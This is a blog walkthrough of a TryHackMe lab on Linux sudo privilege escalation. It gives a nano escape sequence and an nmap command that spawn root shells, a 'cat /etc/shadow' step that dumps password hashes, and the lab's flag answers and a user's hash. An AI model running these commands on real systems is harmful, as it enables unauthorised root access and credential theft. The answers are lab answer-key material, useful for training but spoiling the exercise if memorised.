TryHackMe - Linux Privilege Escalation: Sudo

TryHackMe - Linux Privilege Escalation: Sudo

This article discusses the solution for TryHackMe's Linux Privilege Escalation Kernel Sudo tasks so proceed with caution.

I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.

Privilege Escalation SUDO Solution

Notes:

  • A user may be given sudo privileges for specific applictions.

  • Can use these programs to execute sudo commands

  • Refer to GTFO BINS for reference.

  • Also check LD_PRELOAD exploit.

How many programs can the user "karen" run on the target system with sudo rights?

  1. Execute sudo -l

Screenshot 2024-02-11 at 11 15 17 PM

Answer:3

What is the content of the flag2.txt file?

  1. Let's go to https://gtfobins.github.io/#+sudo. Based on the previous question above we have a sudo exploit for nano. https://gtfobins.github.io/gtfobins/nano/#sudo

     sudo nano
    

    The inside the nano editor execute the following:

     ^R^X
     reset; sh 1>&0 2>&0
    

    Screenshot 2024-02-11 at 11 20 48 PM

  2. We will have a terminal with root access within nano.

Answer: THM-402028394

How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

  1. Again go to https://gtfobins.github.io/#+sudo, and lookup nmap.

Answer: sudo nmap --interactive

Screenshot 2024-02-11 at 11 26 31 PM

What is the hash of frank's password?

  1. Execute the following command and look for frank's password hash. (still using the terminal inside nano).
cat /etc/shadow

Screenshot 2024-02-11 at 11 31 06 PM

Answer: $6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1

Until next time. Keep learning.

Stay stoked and code. :)


I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)

Thank you very much. :)